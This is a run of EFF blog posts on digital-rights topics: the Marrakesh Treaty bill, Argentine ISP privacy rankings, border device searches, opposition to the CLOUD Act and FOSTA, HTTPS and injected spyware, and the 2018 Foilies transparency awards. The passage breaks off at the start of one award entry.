Today the Marrakesh Treaty Implementation Bill was introduced into Congress by Senators Chuck Grassley (R-IA), Bob Corker (R-TN), Dianne Feinstein (D-CA), Bob Menendez (D-NJ), Kamala Harris (D-CA), Orrin Hatch (R-UT), and Patrick Leahy (D-VT). The bill implements the Marrakesh Treaty to Facilitate Access to Published Works for Persons Who Are Blind, Visually Impaired or Otherwise Print Disabled, a landmark treaty that was adopted by the World Intellectual Property Organisation (WIPO) in June 2013, and has since been ratified by 37 other countries. The treaty is notable in that it is the first WIPO treaty passed primarily for a disadvantaged class of users, rather than for the benefit of copyright holders.
When passed, the bill will allow those who are blind, visually impaired, or otherwise reading disabled (for example, being unable to pick up and turn the pages of a book) to make free use of written works in accessible formats such as braille, large print, or audiobook. Although similar provisions were already part of U.S. law, the amendments made by this bill slightly broadens the class of beneficiaries who were eligible for access to such works.
Even more significantly, the implementation bill will ensure that it is legal for accessible works to be sent between the U.S. and other countries that are signatories to the Marrakesh Treaty. There are many blind, visually impaired, and print disabled users in countries that do not have the capacity to produce their own accessible works, reflected in the fact that such users in poor countries have access to only 1% of published books in accessible formats, compared with 7% in rich countries. Allowing eligible users throughout the world access to works that have been created in any other Marrakesh signatory countries is a compassionate and sensible solution to this "book famine."
The implementation bill tracks the Marrakesh Treaty closely, and it is not, as we had once feared, tied to the implementation of the much more problematic Beijing Treaty on Audiovisual Performances, which would require more significant changes to U.S. law. The National Federation for the Blind, libraries, publishers, the Copyright Office and the U.S. Patent and Trademark Office (USPTO) all support the Marrakesh Treaty Implementation Bill, and so does EFF. We wish the bill's sponsors success in seeing its speedy passage through Congress.
It’s Argentina's turn to take a closer look at the practices of their local Internet Service Providers, and how they treat their customers’ personal data when the government comes knocking.
Argentina's ¿Quien Defiende Tus Datos? (Who Defends Your Data?) is a project of Asociación por los Derechos Civiles and the Electronic Frontier Foundation, and is part of a region-wide initiative by leading Iberoamerican digital rights groups to turn a spotlight on how the policies of Internet Service Providers either advance or hinder the privacy rights of users.
The report is based on EFF's annual Who Has Your Back? report, but adapted to local laws and realities. Last year Brazil’s Internet Lab, Colombia’s Karisma Foundation, Paraguay's TEDIC, and Chile’s Derechos Digitales published their own 2017 reports, and ETICAS Foundation released a similar study earlier this year, part of a series across Latin America and Spain.
The report set out to examine which Argentine ISPs best defend their customers. Which are transparent about their policies regarding requests for data? Do any challenge disproportionate data demands for their users’ data? Which require a judicial order before handing over personal data? Do any of the companies notify their users when complying with judicial requests? ADC examined publicly posted information, including the privacy policies and codes of practice, from five of the biggest Argentine telecommunications access providers: Cablevisión (Fibertel), Telefónica (Speedy), Telecom (Arnet), Telecentro, IPLAN, and DirecTV (AT&T). Between them, these providers cover 90% of the fixed and broadband market.
Each company was given the opportunity to answer a questionnaire, to take part in a private interview and to send any additional information if they felt appropriate, all of which was incorporated into the final report. ADC’s rankings for Argentine ISPs are below; the full report, which includes details about each company, is available at: https://adcdigital.org.ar/qdtdEvaluation Criteria for ¿Quién Defiende tus Datos?
- Transparency: whether they publish transparency reports that are accessible to the public, and how many requests have been received, compiled and rejected, including details about the type of requests, the government agencies that made the requests and the reasons provided by the authority.
- Notification: whether they provide any kind of notification to customers of government data demands, and bonus points if they do the notification apriori.
- Judicial Court: Whether they require the government to obtain a court order before handing over data, and if they judicially resist data requests that are excessive and do not comply with legal requirements.
- Law Enforcement Guidelines: whether they publish their guidelines for law enforcement requests.
Companies in Argentina are off to a good start but still have a way to go to fully protect their customers’ personal data and be transparent about who has access to it. ADC and EFF expect to release this report annually to incentivize companies to improve transparency and protect user data. This way, all Argentines will have access to information about how their personal data is used and how it is controlled by ISPs so they can make smarter consumer decisions. We hope next year’s report will shine with more stars.
EFF filed an amicus brief last year in the case, arguing that the Supreme Court’s decision in Riley v. California (2014) supports the conclusion that border agents need a probable cause warrant before searching electronic devices because of the unprecedented and significant privacy interests travelers have in their digital data. In Riley, the Supreme Court followed similar reasoning and held that police must obtain a warrant to search the cell phone of an arrestee.
In U.S. v. Molina-Isidoro, although the Fifth Circuit declined to decide whether the Fourth Amendment requires border agents to get a warrant before searching travelers’ electronic devices, one judge invoked prior case law that could help us establish this privacy protection.
Ms. Molina-Isidoro attempted to enter the country at the port of entry at El Paso, TX. An x-ray of her suitcase led border agents to find methamphetamine. They then manually searched her cell phone and looked at her Uber and WhatsApp applications. The government sought to use her correspondence in WhatsApp in her prosecution, so she moved to suppress this evidence, arguing that it was obtained in violation of the Constitution because the border agents didn’t have a warrant.
Unfortunately for Molina-Isidoro, the Fifth Circuit ruled that the WhatsApp messages may be used in her prosecution. But the court avoided the main constitutional question: whether the Fourth Amendment requires a warrant to search an electronic device at the border. Instead, the court held that the border agents acted in “good faith”—an independent basis to deny Molina-Isidoro’s motion to suppress, even if the agents had violated the Fourth Amendment.
The Fifth Circuit presented two bases for its finding of “good faith”—factual and legal. The factual basis of the agents’ “good faith” was that there was probable cause to support a search of Molina-Isidoro’s phone. The finding of drugs in her luggage, according to the Fifth Circuit, “created a fair probability that the phone contained communications with the brother she supposedly visited (or whoever was the actual source of the drugs) and other information about her travel to refute the nonsensical story she had provided.” The legal basis of the agents’ “good faith” was pre-Riley case law that generally permits warrantless and suspicionless “routine” searches of items travelers carry across the border. While the court did not rule on whether Riley requires a warrant for border device searches, the court did emphasize that a leading Fourth Amendment legal treatise recognizes that “Riley may prompt a reassessment” of the question.
Additionally, Fifth Circuit Judge Gregg Costa issued an instructive concurring opinion. While he agreed with the decision to let the WhatsApp evidence stand, based on the border agents’ “good faith,” he made two key points we have made in our own briefs.
First, Judge Costa considered whether the traditional primary purpose of the Fourth Amendment’s border search exception—customs enforcement—justifies conducting warrantless, suspicionless searches of electronic devices. As we have argued, the link between these ends and means is very weak. Judge Costa agreed: “Detection of … contraband is the strongest historic rationale for the border search exception.” Yet, “Most contraband, the drugs in this case being an example, cannot be stored within the data of a cell phone.” He concluded, “this detection-of-contraband justification would not seem to apply to an electronic search of a cellphone or computer.” We made the same argument in our amicus brief: “Just as the Riley Court stated that ‘data on the phone can endanger no one,’ physical items cannot be hidden in digital data.”
Second, Judge Costa considered whether an “evidence-gathering justification” could support warrantless, suspicionless border searches of electronic devices. He questioned this, citing an 1886 Supreme Court customs case, Boyd v. U.S., which we also cited in our amicus brief. The Boyd Court held:
The search for and seizure of stolen or forfeited goods, or goods liable to duties and concealed to avoid the payment thereof, are totally different things from a search for and seizure of a man's private books and papers for the purpose of obtaining information therein contained, or of using them as evidence against him.
In other words, while border agents have an interest in preventing the importation of physical contraband, they have at most a much lesser interest in searching papers to find evidence of crime. Judge Costa seemed persuaded by this holding in Boyd, especially given the unprecedented privacy interests modern travelers have in their digital data, stating:
[Boyd’s] emphatic distinction between the sovereign’s historic interest in seizing imported contraband and its lesser interest in seizing records revealing unlawful importation has potential ramifications for the application of the border-search authority to electronic data that cannot conceal contraband and that, to a much greater degree than the papers in Boyd, contains information that is “like an extension of the individual’s mind”…
While we would have liked the Fifth Circuit to affirmatively hold that the Fourth Amendment bars a border search of a cell phone without a probable cause warrant, we’re optimistic that we can win such a ruling in our civil case against the U.S. Department of Homeland Security, Alasaad v. Nielsen, challenging warrantless border searches of electronic devices.
There’s a new, proposed backdoor to our data, which would bypass our Fourth Amendment protections to communications privacy. It is built into a dangerous bill called the CLOUD Act, which would allow police at home and abroad to seize cross-border data without following the privacy rules where the data is stored.
This backdoor is an insidious method for accessing our emails, our chat logs, our online videos and photos, and our private moments shared online between one another. This backdoor would deny us meaningful judicial review and the privacy protections embedded in our Constitution.
This new backdoor for cross-border data mirrors another backdoor under Section 702 of the FISA Amendments Act, an invasive NSA surveillance authority for foreign intelligence gathering. That law, recently reauthorized and expanded by Congress for another six years, gives U.S. intelligence agencies, including the NSA, FBI, and CIA, the ability to search, read, and share our private electronic messages without first obtaining a warrant.
The new backdoor in the CLOUD Act operates much in the same way. U.S. police could obtain Americans’ data, and use it against them, without complying with the Fourth Amendment.
For this reason, and many more, EFF strongly opposes the CLOUD Act.
The CLOUD Act (S. 2383 and H.R. 4943) has two major components. First, it empowers U.S. law enforcement to grab data stored anywhere in the world, without following foreign data privacy rules. Second, it empowers the president to unilaterally enter executive agreements with any nation on earth, even known human rights abusers. Under such executive agreements, foreign law enforcement officials could grab data stored in the United States, directly from U.S. companies, without following U.S. privacy rules like the Fourth Amendment, so long as the foreign police are not targeting a U.S. person or a person in the United States.
That latter component is where the CLOUD Act’s backdoor lives.
When foreign police use their power under CLOUD Act executive agreements to collect a foreign target’s data from a U.S. company, they might also collect data belonging to a non-target U.S. person who happens to be communicating with the foreign target. Within the numerous, combined foreign investigations allowed under the CLOUD Act, it is highly likely that related seizures will include American communications, including email, online chat, video calls, and internet voice calls.
Under the CLOUD Act’s rules for these data demands from foreign police to U.S. service providers, this collection of Americans’ data can happen without any prior, individualized review by a foreign or American judge. Also, it can happen without the foreign police needing to prove the high level of suspicion required by the U.S. Fourth Amendment: probable cause.
Once the foreign police have collected Americans’ data, they often will be able to hand it over to U.S. law enforcement, which can use it to investigate Americans, and ultimately to bring criminal charges against them in the United States.
According to the bill, foreign police can share the content of a U.S person’s communications with U.S. authorities so long as it “relates to significant harm, or the threat thereof, to the United States or United States persons.” This nebulous standard is vague and overbroad. Also, the bill’s hypotheticals indicate far-ranging data sharing by foreign police with U.S. authorities. From national security to violent crime, from organized crime to financial fraud, the CLOUD Act permits it all to be shared, and likely far more.
Moreover, the CLOUD Act allows the foreign police who collect Americans’ communications to freely use that content against Americans, and to freely share it with additional nations.
To review: The CLOUD Act allows the president to enter an executive agreement with a foreign nation known for human rights abuses. Using its CLOUD Act powers, police from that nation inevitably will collect Americans’ communications. They can share the content of those communications with the U.S. government under the flawed “significant harm” test. The U.S. government can use that content against these Americans. A judge need not approve the data collection before it is carried out. At no point need probable cause be shown. At no point need a search warrant be obtained.
This is wrong. Much like the infamous backdoor search loophole connected to broad, unconstitutional NSA surveillance under Section 702, the backdoor proposed in the CLOUD Act violates our Fourth Amendment right to privacy by granting unconstitutional access to our private lives online.
Also, when foreign police using their CLOUD Act powers inevitably capture metadata about Americans, they can freely share it with the U.S. government, without even showing “significant harm.” Communications “content” is the words in an email or online chat, the recordings of an internet voice call, or the moving images and coordinating audio of a video call online. Communications “metadata” is the pieces of information that relate to a message, including when it was sent, who sent it, who received it, its duration, and where the sender was located when sending it. Metadata is enormously powerful information and should be treated with the same protection as content.
To be clear: the CLOUD Act fails to provide any limits on foreign police sharing Americans’ metadata with U.S. police.
The CLOUD Act would be a dangerous overreach into our data. It seeks to streamline cross-border police investigations, but it tears away critical privacy protections to attain that goal. This is not a fair trade. It is a new backdoor search loophole around the Fourth Amendment.
Tell your representative today to reject the CLOUD Act.
Stop the CLOUD Act
We have heard that the Allow States and Victims to Fight Online Sex Trafficking Act (FOSTA, H.R. 1865) may be on the U.S. Senate floor this week for a final vote. We are concerned that the U.S. Senate appears to be rushing to pass a seriously flawed bill without considering the impact it will have on Internet users and free speech.
We wrote Majority Leader Mitch McConnell and Democratic Leader Charles E. Schumer to share our concerns:
Websites and apps we all use every day - from WhatsApp and Instagram to Yelp and Wikipedia, even blogs and news websites with comment sections - rely on Section 230 (47 U.S.C § 230). Under Section 230, users are generally liable for the content they post, not the platforms. This bill would change that by expanding a platform's liability beyond its own actions - if this bill passes, online platforms would be responsible for their users' speech and behavior in addition to their own.
Current law, including Section 230, does not prevent federal prosecutors from going after online platforms that knowingly advertise sex trafficking. Additionally, courts have allowed civil claims against online platforms when a platform was shown to have a direct hand in creating the illegal content. New authorities are simply not needed to bring bad platforms or the pimps and "johns" who directly harmed victims to justice.
Section 230 can be credited with creating today's Internet. Congress made the deliberate choice to protect online free speech and innovation, while providing discrete tools to go after culpable platforms. Section 230 provided the legal buffer entrepreneurs needed to experiment with new ways to connect people online and is just as critical for today's startups as it was for today's popular platforms when they launched.
FOSTA would destroy the careful policy balance struck in Section 230. By opening platforms to increased criminal and civil liability at both the federal and state levels for user-generated content, the bill would incentivize those platforms to over-censor their users. Since it would be difficult if not impossible for platforms, both large and small, to review every post individually for sex trafficking content (or to definitively know whether a piece of online content reflects a sex trafficking situation in the offline world), platforms would have little choice but to adopt overly restrictive content moderation practices-silencing legitimate voices in the process. Trafficking victims themselves would likely be the first to be censored under FOSTA.
In addition to opening platforms to increased liability under civil law and state criminal law, FOSTA would also create new federal crimes designed to target online platforms. The expanded federal sex trafficking crimes would not require a platform owner to have knowledge that people are using the platform for sex trafficking-but only have "reckless disregard" of this fact. The Department of Justice already has a powerful legal tool to prosecute culpable online platforms: the SAVE Act of 2015 made it a crime under 18 U.S.C. § 1591 to advertise sexual services with knowledge that trafficking is taking place.
You can read the rest of the letter here.
We Still Need More HTTPS: Government Middleboxes Caught Injecting Spyware, Ads, and Cryptocurrency Miners
Last week, researchers at Citizen Lab discovered that Sandvine's PacketLogic devices were being used to hijack users' unencrypted internet connections, making yet another case for encrypting the web with HTTPS. In Turkey and Syria, users who were trying to download legitimate applications were instead served malicious software intending to spy on them. In Egypt, these devices injected money-making content into users' web traffic, including advertisements and cryptocurrency mining scripts.
These are all standard machine-in-the-middle attacks, where a computer on the path between your browser and a legitimate web server is able to intercept and modify your traffic data. This can happen if your web connections use HTTP, since data sent over HTTP is unencrypted and can be modified or read by anyone on the network.
Site operators can mitigate these attacks by using HTTPS instead of HTTP. And as a user, it's easy to see when a web page has been loaded over HTTPS—check for “https” at the beginning of the URL or, on most common browsers, a green lock icon displayed next to the address bar. However, it can still be hard to tell when you're downloading files insecurely. For instance, Avast's website was hosted over HTTPS, but their downloads were not.
Today, Let’s Encrypt and Certbot make it easier than ever to deploy HTTPS websites and to serve content securely. And later this year, Chrome is planning on marking all HTTP sites as “not secure”. Thanks to these collective efforts and many more, almost 80% of web traffic in the U.S. is now encrypted with HTTPS. If you want to be sure you’re browsing securely, EFF’s HTTPS Everywhere browser extension can force your browser to use it wherever possible.
We've come a long way with HTTPS adoption since 2010, when EFF first started pushing tech companies to support it. Evidently, we still have a long way to go.
EFF and 23 other civil liberties organizations sent a letter to Congress urging Members and Senators to oppose the CLOUD Act and any efforts to attach it to other legislation.
The CLOUD Act (S. 2383 and H.R. 4943) is a dangerous bill that would tear away global privacy protections by allowing police in the United States and abroad to grab cross-border data without following the privacy rules of where the data is stored. Currently, law enforcement requests for cross-border data often use a legal system called the Mutual Legal Assistance Treaties, or MLATs. This system ensures that, for example, should a foreign government wish to seize communications stored in the United States, that data is properly secured by the Fourth Amendment requirement for a search warrant.
The other groups signing the new coalition letter against the CLOUD Act are Access Now, Advocacy for Principled Action in Government, American Civil Liberties Union, Amnesty International USA, Asian American Legal Defense and Education Fund (AALDEF), Campaign for Liberty, Center for Democracy & Technology, CenterLink: The Community of LGBT Centers, Constitutional Alliance, Defending Rights & Dissent, Demand Progress Action, Equality California, Free Press Action Fund, Government Accountability Project, Government Information Watch, Human Rights Watch, Liberty Coalition, National Association of Criminal Defense Lawyers, National Black Justice Coalition, New America's Open Technology Institute, OpenMedia, People For the American Way, and Restore The Fourth.
The CLOUD Act allows police to bypass the MLAT system, removing vital U.S. and foreign country privacy protections. As we explained in our earlier letter to Congress, the CLOUD Act would:
- Allow foreign governments to wiretap on U.S. soil under standards that do not comply with U.S. law;
- Give the executive branch the power to enter into foreign agreements without Congressional approval or judicial review, including foreign nations with a well-known record of human rights abuses;
- Possibly facilitate foreign government access to information that is used to commit human rights abuses, like torture; and
- Allow foreign governments to obtain information that could pertain to individuals in the U.S. without meeting constitutional standards.
You can read more about EFF’s opposition to the CLOUD Act here.
The CLOUD Act creates a new channel for foreign governments seeking data about non-U.S. persons who are outside the United States. This new data channel is not governed by the laws of where the data is stored. Instead, the foreign police may demand the data directly from the company that handles it. Under the CLOUD Act, should a foreign government request data from a U.S. company, the U.S. Department of Justice would not need to be involved at any stage. Also, such requests for data would not need to receive individualized, prior judicial review before the data request is made.
The CLOUD Act’s new data delivery method lacks not just meaningful judicial oversight, but also meaningful Congressional oversight, too. Should the U.S. executive branch enter a data exchange agreement—known as an “executive agreement”—with foreign countries, Congress would have little time and power to stop them. As we wrote in our letter:
“[T]he CLOUD Act would allow the executive branch to enter into agreements with foreign governments—without congressional approval. The bill stipulates that any agreement negotiated would go into effect 90 days after Congress was notified of the certification, unless Congress enacts a joint resolution of disapproval, which would require presidential approval or sufficient votes to overcome a presidential veto.”
And under the bill, the president could agree to enter executive agreements with countries that are known human rights abusers.
Troublingly, the bill also fails to protect U.S. persons from the predictable, non-targeted collection of their data. When foreign governments request data from U.S. companies about specific “targets” who are non-U.S. persons not living in the United States, these governments will also inevitably collect data belonging to U.S. persons who communicate with the targeted individuals. Much of that data can then be shared with U.S. authorities, who can then use the information to charge U.S. persons with crimes. That data sharing, and potential criminal prosecution, requires no probable cause warrant as required by the Fourth Amendment, violating our constitutional rights.
The CLOUD Act is a bad bill. We urge Congress to stop it, and any attempts to attach it to must-pass spending legislation.
Stop the CLOUD Act
Government transparency laws like the Freedom of Information Act exist to enforce the public’s right to inspect records so we can all figure out what the heck is being done in our name and with our tax dollars.
But when a public agency ignores, breaks or twists the law, your recourse varies by jurisdiction. In some states, when an official improperly responds to your public records request, you can appeal to a higher bureaucratic authority or seek help from an ombudsperson. In most states, you can take the dispute to court.
Public shaming and sarcasm, however, are tactics that can be applied anywhere.
The California-based news organization Reveal tweets photos of chickpeas or coffee beans to represent each day a FOIA response is overdue, and asks followers to guess how many there are. The alt weekly DigBoston has sent multiple birthday cakes and edible arrangements to local agencies on the one-year anniversary of delayed public records requests. And here, at the Electronic Frontier Foundation, we give out The Foilies during Sunshine Week, an annual celebration of open-government advocacy.
In its fourth year, The Foilies recognizes the worst responses to records requests, outrageous efforts to stymie transparency and the most absurd redactions. These tongue-in-cheek pseudo-awards are hand-chosen by EFF’s team based on nominations from fellow transparency advocates, participants in #FOIAFriday on Twitter, and, in some cases, our own personal experience.
If you haven’t heard of us before, EFF is a nonprofit based in San Francisco that works on the local, national and global level to defend and advance civil liberties as technology develops. As part of this work, we file scores of public records requests and take agencies like the U.S. Department of Justice, the Department of Homeland Security, and the Los Angeles Police Department to court to liberate information that belongs to the public.
Because shining a spotlight is sometimes the best the litigation strategy, we are pleased to announce the 2018 winners of The Foilies.
Quick links to the winners:
- The Mulligan Award - Pres. Donald J. Trump
- FOIA Fee of the Year - Texas Department of Criminal Justice
- Best Set Design in a Transparency Theater Production - Atlanta Mayor Kasim Reed
- Special Achievement for Analog Conversion - Former Seattle Mayor Ed Murray
- The Winger Award for FOIA Feet Dragging - FBI
- The Prime Example Award – Midcoast Regional Redevelopment Authority (Maine)
- El Premio del Desayuno Más Redactado - CIA
- The Courthouse Bully Award - Every Agency Suing a Requester
- The Lawless Agency Award - U.S. Customs and Border Protection
- The Franz Kafka Award for Most Secrets About Secretive Secrecy - CIA
- Special Recognition for Congressional Overreach - U.S. House of Representatives
- The Data Disappearance Award - Trump Administration
- The Danger in the Dark Award - The Army Corps of Engineers
- The Business Protection Agency Award - The Food and Drug Administration
- The Exhausted Mailman Award - Bureau of Indian Affairs
- Crime & Punishment Award - Martin County Commissioners (Florida)
- The Square Footage Award - Jacksonville Sheriff’s Office (Florida)
- These Aren’t the Records You’re Looking For Award - San Diego City Councilmember Chris Cate
Since assuming the presidency, Donald Trump has skipped town more than 55 days to visit his Mar-a-Lago resort in Florida, according to sites like trumpgolfcount.com and NBC. He calls it his “Winter White House,” where he wines and dines and openly strategizes how to respond to North Korean ballistic missile tests with the Japanese prime minister for all his paid guests to see and post on Facebook. The fact that Trump’s properties have become secondary offices and remain a source of income for his family raises significant questions about transparency, particularly if club membership comes with special access to the president. To hold the administration accountable, Citizens for Responsibility and Ethics in Washington filed a FOIA request for the visitor logs, but received little in response. CREW sued and, after taking another look, the Secret Service provided details about the Japanese leader’s entourage. As Politico and others reported, the Secret Service ultimately admitted they’re not actually keeping track. The same can’t be said about Trump’s golf score.FOIA Fee of the Year - Texas Department of Criminal Justice
Sexual assault in prison is notoriously difficult to measure due to stigma, intimidation, and apathetic bureaucracy. Nevertheless, MuckRock reporter Nathanael King made a valiant effort to find out whatever he could about these investigations in Texas, a state once described by the Dallas Voice as the “Prison Rape Capital of the U.S.” However, the numbers that the Texas Department of Criminal Justice came back with weren’t quite was he was expecting. TDCJ demanded he fork over a whopping $1,132,024.30 before the agency would release 260,000 pages of records that it said would take 61,000 hours of staff time to process. That in itself may be an indicator of the scope of the problem. However, to the agency’s credit, they pointed the reporter in the direction of other statistical records compiled to comply with the federal Prison Rape Elimination Act, which TDCJ provided for free.Best Set Design in a Transparency Theater Production - Atlanta Mayor Kasim Reed
“Transparency theater” is the term we use to describe an empty gesture meant to look like an agency is embracing open government, when really it’s meant to obfuscate. For example, an agency may dump an overwhelming number of documents and put them on display for cameras. But because there are so many records, the practice actually subverts transparency by making it extremely difficult to find the most relevant records in the haystack.
Such was the case with Atlanta Mayor Kasim Reed, who released 1.476 million documents about a corruption probe to show his office was supporting public accountability.
“The documents filled hundreds of white cardboard boxes, many stacked up waist high against walls and spread out over rows of tables in the cavernous old City Council chamber,” Atlanta Journal-Constitution reporter Leon Stafford wrote. “Reed used some of the boxes as the backdrop for his remarks, creating a six-foot wall behind him.”
Journalists began to dig through the documents and quickly discovered that many were blank pages or fully redacted, and in some cases the type was too small for anyone to read. AJC reporter J. Scott Trubey’s hands became covered in papercut gore. Ultimately, the whole spectacle was a waste of trees: The records already existed in a digital format. It’s just that a couple of hard drives on a desk don’t make for a great photo op.Special Achievement for Analog Conversion - Former Seattle Mayor Ed Murray
In the increasingly digital age, more and more routine office communication is occurring over mobile devices. With that in mind, transparency activist Phil Mocek filed a request for text messages (and other app communications) sent or received by now-former Seattle Mayor Ed Murray and many of his aides. The good news is the city at least partially complied. The weird news is that rather than seek the help of an IT professional to export the text messages, some staff simply plopped a cell phone onto a photocopier. Mocek tells EFF he’s frustrated that the mayor’s office refused to search their personal devices for relevant text messages. They argued that city policy forbids using personal phones for city business—and of course, no one would violate those rules. However, we’ll concede that thwarting transparency is probably the least of the allegations against Murray, who resigned in September 2017 amid a child sex-abuse scandal.The Winger Award for FOIA Feet Dragging - FBI
Thirty years ago, the hair-rock band Winger released “Seventeen”—a song about young love that really hasn’t withstood the test of time. Similarly, the FBI’s claim that it would take 17 years to produce a series of records about civil rights-era surveillance also didn’t withstand the judicial test of time.
As Politico reported, George Washington University professor and documentary filmmaker Nina Seavey asked for records about how the FBI spied on antiwar and civil rights activists in the 1960s and 1970s. The FBI claimed they would only process 500 pages a month, which would mean the full set of 110,000 pages wouldn’t be complete until 2034.
Just as Winger’s girlfriend’s dad disapproved in the song, so did a federal judge, writing in her opinion: “The agency's desire for administrative convenience is simply not a valid justification for telling Professor Seavey that she must wait decades for the documents she needs to complete her work.”The Prime Example Award – Midcoast Regional Redevelopment Authority (Maine)
When Amazon announced last year it was seeking a home for its second headquarters, municipalities around the country rushed to put together proposals to lure the tech giant to their region. Knowing that in Seattle Amazon left a substantial footprint on a community (particularly around housing), transparency organizations like MuckRock and the Lucy Parsons Labs followed up with records requests for these cities’ sales pitches.
More than 20 cities, such as Chula Vista, California, and Toledo, Ohio, produced the records—but other agencies, including Albuquerque, New Mexico, and Jacksonville, Florida, refused to turn over the documents. The excuses varied, but perhaps the worst response came from Maine’s Midcoast Regional Redevelopment Authority. The agency did provide the records, but claimed that by opening an email containing 37 pages of documents, MuckRock had automatically agreed to pay an exorbitant $750 in “administrative and legal fees.” Remind us to disable one-click ordering.El Premio del Desayuno Más Redactado - CIA
Buzzfeed reporter Jason Leopold has filed thousands of records requests over his career, but one redaction has become his all-time favorite. Leopold was curious whether CIA staff are assailed by the same stream of office announcements as every other workplace. So, he filed a FOIA request—and holy Hillenkoetter, do they. Deep in the document set was an announcement that “the breakfast burritos are back by popular demand,” with a gigantic redaction covering half the page citing a personal privacy exemption. What are they hiding? Is Anthony Bourdain secretly a covert agent? Did David Petraeus demand extra guac? This could be the CIA’s greatest Latin American mystery since Nicaraguan Contra drug-trafficking.The Courthouse Bully Award - Every Agency Suing a Requester
As director of the privacy advocacy group We See You Watching Lexington, Michael Maharrey filed a public records request to find out how his city was spending money on surveillance cameras. After the Lexington Police Department denied the request, he appealed to the Kentucky Attorney General’s office—and won.
Rather than listen to the state’s top law enforcement official, Lexington Police hauled Maharrey into court.
As the Associated Press reported last year, lawsuits like these are reaching epidemic proportions. The Louisiana Department of Education sued a retired educator who was seeking school enrollment data for his blog. Portland Public Schools in Oregon sued a parent who was curious about employees paid while on leave for alleged misconduct. Michigan State University sued ESPN after it requested police reports on football players allegedly involved in a sexual assault. Meanwhile, the University of Kentucky and Western Kentucky University have each sued their own student newspapers whose reporters were investigating sexual misconduct by school staff.
These lawsuits are despicable. At their most charitable, they expose huge gaps in public records laws that put requesters on the hook for defending lawsuits they never anticipated. At their worst, they are part of a systematic effort to discourage reporters and concerned citizens from even thinking of filing a public records request in the first place.The Lawless Agency Award - U.S. Customs and Border Protection
In the chaos of President Trump’s immigration ban in early 2017, the actions of U.S. Customs and Border Protection agents and higher-ups verged on unlawful. And if CBP officials already had their mind set on violating all sorts of laws and the Constitution, flouting FOIA seems like small potatoes.
Yet that’s precisely what CBP did when the ACLU filed a series of FOIA requests to understand local CBP agents’ actions as they implemented Trump’s immigration order. ACLU affiliates throughout the country filed 18 separate FOIA requests with CBP, each of which targeted records documenting how specific field offices, often located at airports or at physical border crossings, were managing and implementing the ban. The requests made clear that they were not seeking agency-wide documents but rather wanted information about each specific location’s activities.
CBP ignored the requests and, when several ACLU affiliates filed 13 different lawsuits, CBP sought to further delay responding by asking a federal court panel to consolidate all the cases into a single lawsuit. To use this procedure—which is usually reserved for class actions or other complex national cases—CBP essentially misled courts about each of the FOIA requests and claimed each was seeking the exact same set of records.
The court panel saw through CBP’s shenanigans and refused to consolidate the cases. But CBP basically ignored the panel’s decision, acting as though it had won. First, it behaved as though all the requests came from a single lawsuit by processing and batching all the documents from the various requests into a single production given to the ACLU. Second, it selectively released records to particular ACLU attorneys, even when those records weren’t related to their lawsuits about activities at local CBP offices.
Laughably, CBP blames the ACLU for its self-created mess, calling their requests and lawsuits “haphazard” and arguing that the ACLU and other FOIA requesters have strained the agency’s resources in seeking records about the immigration ban. None of that would be a problem if CBP had responded to the FOIA requests in the first place. Of course, the whole mess could also have been avoided if CBP never implemented an unconstitutional immigration order.The Franz Kafka Award for Most Secrets About Secretive Secrecy - CIA
The CIA’s aversion to FOIA is legendary, but this year the agency doubled down on its mission of thwarting transparency. As Emma Best detailed for MuckRock, the intelligence agency had compiled a 20-page report that laid out at least 126 reasons why it could deny FOIA requests that officials believed would disclose the agency’s “sources and methods.”
But that report? Yeah, it’s totally classified. Which is what the agency told Best when they withheld the report in response to her request. So not only do you not get to know what the CIA’s up to, but its reasons for rejecting your FOIA request are also a state secret.Special Recognition for Congressional Overreach - U.S. House of Representatives
Because Congress wrote the Freedom of Information Act, it had the awesome and not-at-all-a-conflict-of-interest power to determine which parts of the federal government must obey it. That’s why it may not shock you that since passing FOIA more than 50 years ago, Congress has never made itself subject to the law.
So far, requesters have been able to fill in the gaps by requesting records from federal agencies that correspond with Congress. For example, maybe a lawmaker writes to the U.S. Department of Puppies asking for statistics on labradoodles. That adorable email chain wouldn’t be available through Congress, but you could get it from the Puppies Department’s FOIA office. (Just to be clear: This isn’t a real federal agency. We just wish it was.)
In 2017 it’s become increasingly clear that some members of Congress believe that FOIA can never reach anything they do, even when they or their staffs share documents or correspond with federal agencies. The House Committee on Financial Services sent a threatening letter to the Treasury Department telling them to not comply with FOIA. After the Department of Health and Human Services and the Office of Management and Budget released records that came from the House Ways and Means Committee, the House intervened in litigation to argue that their records cannot be obtained under FOIA.
In many cases, congressional correspondence with agencies is automatically covered by FOIA, and the fact that a document originated with Congress isn’t by itself enough to shield it from disclosure. The Constitution says Congress gets to write laws; it’s just too bad it doesn’t require Congress to actually read them.The Data Disappearance Award - Trump Administration
Last year, we gave the “Make America Opaque Again Award” award to newly inaugurated President Trump for failing to follow tradition and release his tax returns during the campaign. His talent for refusing to make information available to the public has snowballed into an administration that deletes public records from government websites. From the National Park Service’s climate action plans for national parks, to the U.S.D.A. animal welfare datasets, to nonpartisan research on the corporate income tax, the Trump Administration has decided to make facts that don’t support its positions disappear. The best example of this vanishing game is the Environmental Protection Agency’s removal of the climate change website in April 2017, which only went back online after being scrubbed of climate change references, studies and information to educate the public.The Danger in the Dark Award - The Army Corps of Engineers
When reporters researching the Dakota Access Pipeline on contested tribal lands asked for the U.S. Army Corps of Engineers’ environmental impact statement, they were told nope, you can’t have it. Officials cited public safety concerns as reason to deny the request: “The referenced document contains information related to sensitive infrastructure that if misused could endanger peoples’ lives and property.”
Funny thing is, the Army Corps had already published the same document on its website a year earlier. What changed in that year? Politics. The Standing Rock Sioux, other tribal leaders and “Water Protector” allies had since staged a multi-month peaceful protest and sit-in to halt construction of the pipeline.
The need for public scrutiny of the document became clear in June when a U.S. federal judge found that the environmental impact statement omitted key considerations, such as the impact of an oil spill on the Standing Rock Sioux’s hunting and fishing rights as well as the impact on environmental justice.The Business Protection Agency Award - The Food and Drug Administration
The FDA’s mission is to protect the public from harmful pharmaceuticals, but they’ve recently fallen into the habit of protecting powerful drug companies rather than informing people about potential drug risks.
This past year, Charles Seife at the Scientific American requested documents about the drug approval process for a controversial drug to treat Duchenne muscular dystrophy (DMD). The agency cited business exemptions and obscured listed side effects as well as testing methodology for the drug, despite claims that the drug company manipulated results during product trials and pressured the FDA to push an ineffective drug onto the market. The agency even redacted portions of a Bloomberg Businessweek article about the drug because the story provided names and pictures of teenagers living with DMD.The Exhausted Mailman Award - Bureau of Indian Affairs
